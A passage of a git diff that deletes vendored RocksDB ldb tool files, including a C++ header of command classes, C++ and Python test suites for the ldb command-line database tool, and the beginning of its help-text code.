-  CheckConsistencyCommand(const std::vector<std::string>& params,
-                          const std::map<std::string, std::string>& options,
-                          const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-};
-
-class CheckPointCommand : public LDBCommand {
- public:
-  static std::string Name() { return "checkpoint"; }
-
-  CheckPointCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  std::string checkpoint_dir_;
- private:
-  static const std::string ARG_CHECKPOINT_DIR;
-};
-
-class RepairCommand : public LDBCommand {
- public:
-  static std::string Name() { return "repair"; }
-
-  RepairCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-};
-
-class BackupableCommand : public LDBCommand {
- public:
-  BackupableCommand(const std::vector<std::string>& params,
-                    const std::map<std::string, std::string>& options,
-                    const std::vector<std::string>& flags);
-
- protected:
-  static void Help(const std::string& name, std::string& ret);
-  std::string backup_env_uri_;
-  std::string backup_dir_;
-  int num_threads_;
-  std::unique_ptr<Logger> logger_;
-
- private:
-  static const std::string ARG_BACKUP_DIR;
-  static const std::string ARG_BACKUP_ENV_URI;
-  static const std::string ARG_NUM_THREADS;
-  static const std::string ARG_STDERR_LOG_LEVEL;
-};
-
-class BackupCommand : public BackupableCommand {
- public:
-  static std::string Name() { return "backup"; }
-  BackupCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-  virtual void DoCommand() override;
-  static void Help(std::string& ret);
-};
-
-class RestoreCommand : public BackupableCommand {
- public:
-  static std::string Name() { return "restore"; }
-  RestoreCommand(const std::vector<std::string>& params,
-                 const std::map<std::string, std::string>& options,
-                 const std::vector<std::string>& flags);
-  virtual void DoCommand() override;
-  virtual bool NoDBOpen() override { return true; }
-  static void Help(std::string& ret);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/tools/ldb_cmd_test.cc b/thirdparty/rocksdb/tools/ldb_cmd_test.cc
deleted file mode 100644
index 16f9631..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd_test.cc
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "util/testharness.h"
-
-using std::string;
-using std::vector;
-using std::map;
-
-class LdbCmdTest : public testing::Test {};
-
-TEST_F(LdbCmdTest, HexToString) {
-  // map input to expected outputs.
-  // odd number of "hex" half bytes doesn't make sense
-  map<string, vector<int>> inputMap = {
-      {"0x07", {7}},        {"0x5050", {80, 80}},          {"0xFF", {-1}},
-      {"0x1234", {18, 52}}, {"0xaaAbAC", {-86, -85, -84}}, {"0x1203", {18, 3}},
-  };
-
-  for (const auto& inPair : inputMap) {
-    auto actual = rocksdb::LDBCommand::HexToString(inPair.first);
-    auto expected = inPair.second;
-    for (unsigned int i = 0; i < actual.length(); i++) {
-      EXPECT_EQ(expected[i], static_cast<int>((signed char) actual[i]));
-    }
-    auto reverse = rocksdb::LDBCommand::StringToHex(actual);
-    EXPECT_STRCASEEQ(inPair.first.c_str(), reverse.c_str());
-  }
-}
-
-TEST_F(LdbCmdTest, HexToStringBadInputs) {
-  const vector<string> badInputs = {
-      "0xZZ", "123", "0xx5", "0x111G", "0x123", "Ox12", "0xT", "0x1Q1",
-  };
-  for (const auto badInput : badInputs) {
-    try {
-      rocksdb::LDBCommand::HexToString(badInput);
-      std::cerr << "Should fail on bad hex value: " << badInput << "\n";
-      FAIL();
-    } catch (...) {
-    }
-  }
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as LDBCommand is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_test.py b/thirdparty/rocksdb/tools/ldb_test.py
deleted file mode 100644
index 5d52d79..0000000
--- a/thirdparty/rocksdb/tools/ldb_test.py
+++ /dev/null
@@ -1,551 +0,0 @@
-import os
-import glob
-import os.path
-import shutil
-import subprocess
-import time
-import unittest
-import tempfile
-import re
-
-def my_check_output(*popenargs, **kwargs):
-    """
-    If we had python 2.7, we should simply use subprocess.check_output.
-    This is a stop-gap solution for python 2.6
-    """
-    if 'stdout' in kwargs:
-        raise ValueError('stdout argument not allowed, it will be overridden.')
-    process = subprocess.Popen(stderr=subprocess.PIPE, stdout=subprocess.PIPE,
-                               *popenargs, **kwargs)
-    output, unused_err = process.communicate()
-    retcode = process.poll()
-    if retcode:
-        cmd = kwargs.get("args")
-        if cmd is None:
-            cmd = popenargs[0]
-        raise Exception("Exit code is not 0.  It is %d.  Command: %s" %
-                (retcode, cmd))
-    return output
-
-def run_err_null(cmd):
-    return os.system(cmd + " 2>/dev/null ")
-
-class LDBTestCase(unittest.TestCase):
-    def setUp(self):
-        self.TMP_DIR  = tempfile.mkdtemp(prefix="ldb_test_")
-        self.DB_NAME = "testdb"
-
-    def tearDown(self):
-        assert(self.TMP_DIR.strip() != "/"
-                and self.TMP_DIR.strip() != "/tmp"
-                and self.TMP_DIR.strip() != "/tmp/") #Just some paranoia
-
-        shutil.rmtree(self.TMP_DIR)
-
-    def dbParam(self, dbName):
-        return "--db=%s" % os.path.join(self.TMP_DIR, dbName)
-
-    def assertRunOKFull(self, params, expectedOutput, unexpected=False,
-                        isPattern=False):
-        """
-        All command-line params must be specified.
-        Allows full flexibility in testing; for example: missing db param.
-
-        """
-        output = my_check_output("./ldb %s |grep -v \"Created bg thread\"" %
-                            params, shell=True)
-        if not unexpected:
-            if isPattern:
-                self.assertNotEqual(expectedOutput.search(output.strip()),
-                                    None)
-            else:
-                self.assertEqual(output.strip(), expectedOutput.strip())
-        else:
-            if isPattern:
-                self.assertEqual(expectedOutput.search(output.strip()), None)
-            else:
-                self.assertNotEqual(output.strip(), expectedOutput.strip())
-
-    def assertRunFAILFull(self, params):
-        """
-        All command-line params must be specified.
-        Allows full flexibility in testing; for example: missing db param.
-
-        """
-        try:
-
-            my_check_output("./ldb %s >/dev/null 2>&1 |grep -v \"Created bg \
-                thread\"" % params, shell=True)
-        except Exception, e:
-            return
-        self.fail(
-            "Exception should have been raised for command with params: %s" %
-            params)
-
-    def assertRunOK(self, params, expectedOutput, unexpected=False):
-        """
-        Uses the default test db.
-
-        """
-        self.assertRunOKFull("%s %s" % (self.dbParam(self.DB_NAME), params),
-                             expectedOutput, unexpected)
-
-    def assertRunFAIL(self, params):
-        """
-        Uses the default test db.
-        """
-        self.assertRunFAILFull("%s %s" % (self.dbParam(self.DB_NAME), params))
-
-    def testSimpleStringPutGet(self):
-        print "Running testSimpleStringPutGet..."
-        self.assertRunFAIL("put x1 y1")
-        self.assertRunOK("put --create_if_missing x1 y1", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunFAIL("get x2")
-
-        self.assertRunOK("put x2 y2", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunOK("get x2", "y2")
-        self.assertRunFAIL("get x3")
-
-        self.assertRunOK("scan --from=x1 --to=z", "x1 : y1\nx2 : y2")
-        self.assertRunOK("put x3 y3", "OK")
-
-        self.assertRunOK("scan --from=x1 --to=z", "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x", "x1 : y1\nx2 : y2\nx3 : y3")
-
-        self.assertRunOK("scan --to=x2", "x1 : y1")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=1", "x1 : y1")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=2",
-                "x1 : y1\nx2 : y2")
-
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=3",
-                "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=4",
-                "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x1 --to=x2", "x1 : y1")
-        self.assertRunOK("scan --from=x2 --to=x4", "x2 : y2\nx3 : y3")
-        self.assertRunFAIL("scan --from=x4 --to=z") # No results => FAIL
-        self.assertRunFAIL("scan --from=x1 --to=z --max_keys=foo")
-
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3")
-
-        self.assertRunOK("delete x1", "OK")
-        self.assertRunOK("scan", "x2 : y2\nx3 : y3")
-
-        self.assertRunOK("delete NonExistentKey", "OK")
-        # It is weird that GET and SCAN raise exception for
-        # non-existent key, while delete does not
-
-        self.assertRunOK("checkconsistency", "OK")
-
-    def dumpDb(self, params, dumpFile):
-        return 0 == run_err_null("./ldb dump %s > %s" % (params, dumpFile))
-
-    def loadDb(self, params, dumpFile):
-        return 0 == run_err_null("cat %s | ./ldb load %s" % (dumpFile, params))
-
-    def testStringBatchPut(self):
-        print "Running testStringBatchPut..."
-        self.assertRunOK("batchput x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("scan", "x1 : y1")
-        self.assertRunOK("batchput x2 y2 x3 y3 \"x4 abc\" \"y4 xyz\"", "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 abc : y4 xyz")
-        self.assertRunFAIL("batchput")
-        self.assertRunFAIL("batchput k1")
-        self.assertRunFAIL("batchput k1 v1 k2")
-
-    def testCountDelimDump(self):
-        print "Running testCountDelimDump..."
-        self.assertRunOK("batchput x.1 x1 --create_if_missing", "OK")
-        self.assertRunOK("batchput y.abc abc y.2 2 z.13c pqr", "OK")
-        self.assertRunOK("dump --count_delim", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("dump --count_delim=\".\"", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("batchput x,2 x2 x,abc xabc", "OK")
-        self.assertRunOK("dump --count_delim=\",\"", "x => count:2\tsize:14\nx.1 => count:1\tsize:5\ny.2 => count:1\tsize:4\ny.abc => count:1\tsize:8\nz.13c => count:1\tsize:8")
-
-    def testCountDelimIDump(self):
-        print "Running testCountDelimIDump..."
-        self.assertRunOK("batchput x.1 x1 --create_if_missing", "OK")
-        self.assertRunOK("batchput y.abc abc y.2 2 z.13c pqr", "OK")
-        self.assertRunOK("idump --count_delim", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("idump --count_delim=\".\"", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("batchput x,2 x2 x,abc xabc", "OK")
-        self.assertRunOK("idump --count_delim=\",\"", "x => count:2\tsize:14\nx.1 => count:1\tsize:5\ny.2 => count:1\tsize:4\ny.abc => count:1\tsize:8\nz.13c => count:1\tsize:8")
-
-    def testInvalidCmdLines(self):
-        print "Running testInvalidCmdLines..."
-        # db not specified
-        self.assertRunFAILFull("put 0x6133 0x6233 --hex --create_if_missing")
-        # No param called he
-        self.assertRunFAIL("put 0x6133 0x6233 --he --create_if_missing")
-        # max_keys is not applicable for put
-        self.assertRunFAIL("put 0x6133 0x6233 --max_keys=1 --create_if_missing")
-        # hex has invalid boolean value
-
-    def testHexPutGet(self):
-        print "Running testHexPutGet..."
-        self.assertRunOK("put a1 b1 --create_if_missing", "OK")
-        self.assertRunOK("scan", "a1 : b1")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231")
-        self.assertRunFAIL("put --hex 6132 6232")
-        self.assertRunOK("put --hex 0x6132 0x6232", "OK")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2")
-        self.assertRunOK("get a1", "b1")
-        self.assertRunOK("get --hex 0x6131", "0x6231")
-        self.assertRunOK("get a2", "b2")
-        self.assertRunOK("get --hex 0x6132", "0x6232")
-        self.assertRunOK("get --key_hex 0x6132", "b2")
-        self.assertRunOK("get --key_hex --value_hex 0x6132", "0x6232")
-        self.assertRunOK("get --value_hex a2", "0x6232")
-        self.assertRunOK("scan --key_hex --value_hex",
-                "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan --hex --from=0x6131 --to=0x6133",
-                "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan --hex --from=0x6131 --to=0x6132",
-                "0x6131 : 0x6231")
-        self.assertRunOK("scan --key_hex", "0x6131 : b1\n0x6132 : b2")
-        self.assertRunOK("scan --value_hex", "a1 : 0x6231\na2 : 0x6232")
-        self.assertRunOK("batchput --hex 0x6133 0x6233 0x6134 0x6234", "OK")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2\na3 : b3\na4 : b4")
-        self.assertRunOK("delete --hex 0x6133", "OK")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2\na4 : b4")
-        self.assertRunOK("checkconsistency", "OK")
-
-    def testTtlPutGet(self):
-        print "Running testTtlPutGet..."
-        self.assertRunOK("put a1 b1 --ttl --create_if_missing", "OK")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231", True)
-        self.assertRunOK("dump --ttl ", "a1 ==> b1", True)
-        self.assertRunOK("dump --hex --ttl ",
-                         "0x6131 ==> 0x6231\nKeys in range: 1")
-        self.assertRunOK("scan --hex --ttl", "0x6131 : 0x6231")
-        self.assertRunOK("get --value_hex a1", "0x6231", True)
-        self.assertRunOK("get --ttl a1", "b1")
-        self.assertRunOK("put a3 b3 --create_if_missing", "OK")
-        # fails because timstamp's length is greater than value's
-        self.assertRunFAIL("get --ttl a3")
-        self.assertRunOK("checkconsistency", "OK")
-
-    def testInvalidCmdLines(self):
-        print "Running testInvalidCmdLines..."
-        # db not specified
-        self.assertRunFAILFull("put 0x6133 0x6233 --hex --create_if_missing")
-        # No param called he
-        self.assertRunFAIL("put 0x6133 0x6233 --he --create_if_missing")
-        # max_keys is not applicable for put
-        self.assertRunFAIL("put 0x6133 0x6233 --max_keys=1 --create_if_missing")
-        # hex has invalid boolean value
-        self.assertRunFAIL("put 0x6133 0x6233 --hex=Boo --create_if_missing")
-
-    def testDumpLoad(self):
-        print "Running testDumpLoad..."
-        self.assertRunOK("batchput --create_if_missing x1 y1 x2 y2 x3 y3 x4 y4",
-                "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-        origDbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-
-        # Dump and load without any additional params specified
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump1")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump1")
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load in hex
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump2")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump2")
-        self.assertTrue(self.dumpDb("--db=%s --hex" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --hex --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump only a portion of the key range
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump3")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump3")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --from=x1 --to=x3" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath, "x1 : y1\nx2 : y2")
-
-        # Dump upto max_keys rows
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump4")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump4")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --max_keys=3" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3")
-
-        # Load into an existing db, create_if_missing is not specified
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb("--db=%s" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load with WAL disabled
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump5")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump5")
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --disable_wal --create_if_missing" % loadedDbPath,
-            dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load with lots of extra params specified
-        extraParams = " ".join(["--bloom_bits=14", "--block_size=1024",
-                                "--auto_compaction=true",
-                                "--write_buffer_size=4194304",
-                                "--file_size=2097152"])
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump6")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump6")
-        self.assertTrue(self.dumpDb(
-            "--db=%s %s" % (origDbPath, extraParams), dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s %s --create_if_missing" % (loadedDbPath, extraParams),
-            dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump with count_only
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump7")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump7")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --count_only" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        # DB should have atleast one value for scan to work
-        self.assertRunOKFull("put --db=%s k1 v1" % loadedDbPath, "OK")
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath, "k1 : v1")
-
-        # Dump command fails because of typo in params
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump8")
-        self.assertFalse(self.dumpDb(
-            "--db=%s --create_if_missing" % origDbPath, dumpFilePath))
-
-    def testIDumpBasics(self):
-        print "Running testIDumpBasics..."
-        self.assertRunOK("put a val --create_if_missing", "OK")
-        self.assertRunOK("put b val", "OK")
-        self.assertRunOK(
-                "idump", "'a' seq:1, type:1 => val\n"
-                "'b' seq:2, type:1 => val\nInternal keys in range: 2")
-        self.assertRunOK(
-                "idump --input_key_hex --from=%s --to=%s" % (hex(ord('a')),
-                                                             hex(ord('b'))),
-                "'a' seq:1, type:1 => val\nInternal keys in range: 1")
-
-    def testMiscAdminTask(self):
-        print "Running testMiscAdminTask..."
-        # These tests need to be improved; for example with asserts about
-        # whether compaction or level reduction actually took place.
-        self.assertRunOK("batchput --create_if_missing x1 y1 x2 y2 x3 y3 x4 y4",
-                "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-        origDbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb reduce_levels --db=%s --new_levels=2" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb reduce_levels --db=%s --new_levels=3" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s --from=x1 --to=x3" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s --hex --from=0x6131 --to=0x6134"
-            % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        #TODO(dilip): Not sure what should be passed to WAL.Currently corrupted.
-        self.assertTrue(0 == run_err_null(
-            "./ldb dump_wal --db=%s --walfile=%s --header" % (
-                origDbPath, os.path.join(origDbPath, "LOG"))))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-    def testCheckConsistency(self):
-        print "Running testCheckConsistency..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("put x2 y2", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunOK("checkconsistency", "OK")
-
-        sstFilePath = my_check_output("ls %s" % os.path.join(dbPath, "*.sst"),
-                                      shell=True)
-
-        # Modify the file
-        my_check_output("echo 'evil' > %s" % sstFilePath, shell=True)
-        self.assertRunFAIL("checkconsistency")
-
-        # Delete the file
-        my_check_output("rm -f %s" % sstFilePath, shell=True)
-        self.assertRunFAIL("checkconsistency")
-
-    def dumpLiveFiles(self, params, dumpFile):
-        return 0 == run_err_null("./ldb dump_live_files %s > %s" % (
-            params, dumpFile))
-
-    def testDumpLiveFiles(self):
-        print "Running testDumpLiveFiles..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("put x2 y2", "OK")
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump1")
-        self.assertTrue(self.dumpLiveFiles("--db=%s" % dbPath, dumpFilePath))
-        self.assertRunOK("delete x1", "OK")
-        self.assertRunOK("put x3 y3", "OK")
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump2")
-        self.assertTrue(self.dumpLiveFiles("--db=%s" % dbPath, dumpFilePath))
-
-    def getManifests(self, directory):
-        return glob.glob(directory + "/MANIFEST-*")
-
-    def getSSTFiles(self, directory):
-        return glob.glob(directory + "/*.sst")
-
-    def getWALFiles(self, directory):
-        return glob.glob(directory + "/*.log")
-
-    def copyManifests(self, src, dest):
-        return 0 == run_err_null("cp " + src + " " + dest)
-
-    def testManifestDump(self):
-        print "Running testManifestDump..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put 1 1 --create_if_missing", "OK")
-        self.assertRunOK("put 2 2", "OK")
-        self.assertRunOK("put 3 3", "OK")
-        # Pattern to expect from manifest_dump.
-        num = "[0-9]+"
-        st = ".*"
-        subpat = st + " seq:" + num + ", type:" + num
-        regex = num + ":" + num + "\[" + subpat + ".." + subpat + "\]"
-        expected_pattern = re.compile(regex)
-        cmd = "manifest_dump --db=%s"
-        manifest_files = self.getManifests(dbPath)
-        self.assertTrue(len(manifest_files) == 1)
-        # Test with the default manifest file in dbPath.
-        self.assertRunOKFull(cmd % dbPath, expected_pattern,
-                             unexpected=False, isPattern=True)
-        self.copyManifests(manifest_files[0], manifest_files[0] + "1")
-        manifest_files = self.getManifests(dbPath)
-        self.assertTrue(len(manifest_files) == 2)
-        # Test with multiple manifest files in dbPath.
-        self.assertRunFAILFull(cmd % dbPath)
-        # Running it with the copy we just created should pass.
-        self.assertRunOKFull((cmd + " --path=%s")
-                             % (dbPath, manifest_files[1]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-        # Make sure that using the dump with --path will result in identical
-        # output as just using manifest_dump.
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (manifest_files[1]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-
-    def testSSTDump(self):
-        print "Running testSSTDump..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put sst1 sst1_val --create_if_missing", "OK")
-        self.assertRunOK("put sst2 sst2_val", "OK")
-        self.assertRunOK("get sst1", "sst1_val")
-
-        # Pattern to expect from SST dump.
-        regex = ".*Sst file format:.*"
-        expected_pattern = re.compile(regex)
-
-        sst_files = self.getSSTFiles(dbPath)
-        self.assertTrue(len(sst_files) >= 1)
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (sst_files[0]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-
-    def testWALDump(self):
-        print "Running testWALDump..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put wal1 wal1_val --create_if_missing", "OK")
-        self.assertRunOK("put wal2 wal2_val", "OK")
-        self.assertRunOK("get wal1", "wal1_val")
-
-        # Pattern to expect from WAL dump.
-        regex = "^Sequence,Count,ByteSize,Physical Offset,Key\(s\).*"
-        expected_pattern = re.compile(regex)
-
-        wal_files = self.getWALFiles(dbPath)
-        self.assertTrue(len(wal_files) >= 1)
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (wal_files[0]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-
-    def testListColumnFamilies(self):
-        print "Running testListColumnFamilies..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        cmd = "list_column_families %s | grep -v \"Column families\""
-        # Test on valid dbPath.
-        self.assertRunOKFull(cmd % dbPath, "{default}")
-        # Test on empty path.
-        self.assertRunFAILFull(cmd % "")
-
-    def testColumnFamilies(self):
-        print "Running testColumnFamilies..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put cf1_1 1 --create_if_missing", "OK")
-        self.assertRunOK("put cf1_2 2 --create_if_missing", "OK")
-        self.assertRunOK("put cf1_3 3 --try_load_options", "OK")
-        # Given non-default column family to single CF DB.
-        self.assertRunFAIL("get cf1_1 --column_family=two")
-        self.assertRunOK("create_column_family two", "OK")
-        self.assertRunOK("put cf2_1 1 --create_if_missing --column_family=two",
-                         "OK")
-        self.assertRunOK("put cf2_2 2 --create_if_missing --column_family=two",
-                         "OK")
-        self.assertRunOK("delete cf1_2", "OK")
-        self.assertRunOK("create_column_family three", "OK")
-        self.assertRunOK("delete cf2_2 --column_family=two", "OK")
-        self.assertRunOK(
-            "put cf3_1 3 --create_if_missing --column_family=three",
-            "OK")
-        self.assertRunOK("get cf1_1 --column_family=default", "1")
-        self.assertRunOK("dump --column_family=two",
-                         "cf2_1 ==> 1\nKeys in range: 1")
-        self.assertRunOK("dump --column_family=two --try_load_options",
-                         "cf2_1 ==> 1\nKeys in range: 1")
-        self.assertRunOK("dump",
-                         "cf1_1 ==> 1\ncf1_3 ==> 3\nKeys in range: 2")
-        self.assertRunOK("get cf2_1 --column_family=two",
-                         "1")
-        self.assertRunOK("get cf3_1 --column_family=three",
-                         "3")
-        # non-existing column family.
-        self.assertRunFAIL("get cf3_1 --column_family=four")
-
-if __name__ == "__main__":
-    unittest.main()
diff --git a/thirdparty/rocksdb/tools/ldb_tool.cc b/thirdparty/rocksdb/tools/ldb_tool.cc
deleted file mode 100644
index e8229ef..0000000
--- a/thirdparty/rocksdb/tools/ldb_tool.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/ldb_tool.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "tools/ldb_cmd_impl.h"
-
-namespace rocksdb {
-
-LDBOptions::LDBOptions() {}
-
-void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options,
-                                 const char* exec_name) {
-  std::string ret;
-
-  ret.append(ldb_options.print_help_header);
-  ret.append("\n\n");
-  ret.append("commands MUST specify --" + LDBCommand::ARG_DB +
-             "=<full_path_to_db_directory> when necessary\n");
-  ret.append("\n");
-  ret.append(
-      "The following optional parameters control if keys/values are "
-      "input/output as hex or as plain strings:\n");
-  ret.append("  --" + LDBCommand::ARG_KEY_HEX +
-             " : Keys are input/output as hex\n");
-  ret.append("  --" + LDBCommand::ARG_VALUE_HEX +
-             " : Values are input/output as hex\n");
-  ret.append("  --" + LDBCommand::ARG_HEX +
-             " : Both keys and values are input/output as hex\n");
-  ret.append("\n");
-
-  ret.append(
-      "The following optional parameters control the database "
-      "internals:\n");
-  ret.append(
-      "  --" + LDBCommand::ARG_CF_NAME +
-      "=<string> : name of the column family to operate on. default: default "
-      "column family\n");
-  ret.append("  --" + LDBCommand::ARG_TTL +
-             " with 'put','get','scan','dump','query','batchput'"
-             " : DB supports ttl and value is internally timestamp-suffixed\n");
-  ret.append("  --" + LDBCommand::ARG_TRY_LOAD_OPTIONS +
